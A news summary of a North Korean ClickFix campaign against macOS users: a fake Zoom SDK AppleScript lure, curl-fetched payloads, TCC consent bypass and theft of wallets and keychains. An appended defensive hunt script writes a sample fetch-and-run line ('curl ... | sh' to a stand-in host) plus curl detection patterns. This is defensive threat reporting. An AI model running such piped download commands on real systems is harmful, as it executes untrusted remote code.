North Korea Uses ClickFix to Target macOS Users' Data


Dark Reading, Apr 16, 2026

Why It Matters

The campaign demonstrates how nation‑state actors are adapting social‑engineering tactics to macOS, expanding the threat surface for high‑value financial and intellectual‑property assets. Organizations must tighten user awareness and endpoint controls to prevent similar credential‑theft operations.

Key Takeaways

  • Sapphire Sleet uses fake recruiter profiles to lure macOS users
  • Attack delivers a malicious AppleScript “Zoom SDK Update.scpt” file
  • Payload bypasses macOS TCC framework, preventing consent prompts
  • Data stealer extracts wallets, browsers, keychain, Notes, and Telegram
  • Microsoft recommends blocking .scpt files and user education on ClickFix

Pulse Analysis

ClickFix, a social‑engineering ploy that masquerades as remote‑support assistance, has surged in popularity over the past year. While initially seen in Windows‑centric attacks, the technique is now being weaponized against macOS users by North Korean actors. By exploiting the trust users place in video‑conference tools and the routine nature of software updates, attackers can coax victims into executing malicious code with minimal suspicion. This evolution underscores the adaptability of state‑sponsored threat groups, who continuously refine their lures to match platform‑specific user behaviors.

The Sapphire Sleet operation distinguishes itself through a sophisticated AppleScript delivery chain. Victims receive a fabricated Zoom SDK update, an AppleScript file that opens automatically in macOS Script Editor. Once executed, the script runs a series of curl commands that fetch additional AppleScript payloads, establishing a beacon, harvesting credentials, and deploying backdoors. Notably, the malware manipulates the Transparency, Consent, and Control (TCC) database, renaming critical files to suppress user prompts and silently exfiltrate data from wallets, browsers, keychains, Apple Notes, and even Telegram. This bypass of macOS’s consent framework represents a significant escalation in the threat landscape for Apple environments.

For enterprises, the incident highlights the urgent need to reinforce both technical and human defenses. Microsoft’s recommendations—blocking unsigned .scpt files, restricting execution of Mach‑O binaries, and conducting targeted user training on ClickFix tactics—provide a practical roadmap. Additionally, organizations should monitor for indicators of compromise associated with the campaign and ensure macOS devices receive Apple’s latest security patches. As nation‑state actors continue to diversify their attack vectors, a layered security posture that combines endpoint hardening with continuous awareness programs will be essential to mitigate the risk of credential theft and financial loss.
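As an added defensive example (not code from the article or from Microsoft), a small POSIX shell hunt helper for the two artifacts described above: .scpt files that shell out to curl, and a per-user TCC.db that is missing or has been renamed. The paths, grep patterns and the sample files it creates are assumptions constructed for this demo.

```shell
#!/bin/sh
# Added hunt helper for the two artifacts described in the article: an
# AppleScript (.scpt) dropper that shells out to curl, and tampering with
# the per-user TCC database. Not code from the article or from Microsoft;
# the paths and grep patterns below are assumptions chosen for this demo.

# List .scpt files under a directory whose contents reference curl or
# "do shell script". Compiled .scpt files are binary, so grep runs with -a.
# Prints matching paths; returns 0 if at least one matched, 1 otherwise.
scan_scpt_for_curl() {
    matches=$(find "$1" -type f -name '*.scpt' \
        -exec grep -a -l -i -E 'curl|do shell script' {} + 2>/dev/null)
    [ -n "$matches" ] && printf '%s\n' "$matches"
}

# Check that the per-user TCC database is present at its expected path.
# A missing or renamed TCC.db on an ordinary user account is worth a look.
# Argument: the home directory to inspect (defaults to $HOME).
tcc_db_present() {
    home="${1:-$HOME}"
    [ -f "$home/Library/Application Support/com.apple.TCC/TCC.db" ]
}

# Offline demo on constructed input (no real malware involved): one
# suspicious script and one benign one in a temporary "Downloads" folder.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/Downloads"
    printf 'do shell script "curl -fsSL https://example.invalid/p | sh"\n' \
        > "$tmp/Downloads/Zoom SDK Update.scpt"
    printf 'display dialog "hello"\n' > "$tmp/Downloads/benign.scpt"
    echo "Suspicious .scpt files:"
    scan_scpt_for_curl "$tmp/Downloads" || echo "(none)"
    if tcc_db_present "$tmp"; then
        echo "TCC.db present"
    else
        echo "TCC.db missing or renamed under $tmp"
    fi
    rm -rf "$tmp"
}

demo
```

On a real Mac, point scan_scpt_for_curl at ~/Downloads and run tcc_db_present with no argument; treat any hit as a lead for triage, not a verdict.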

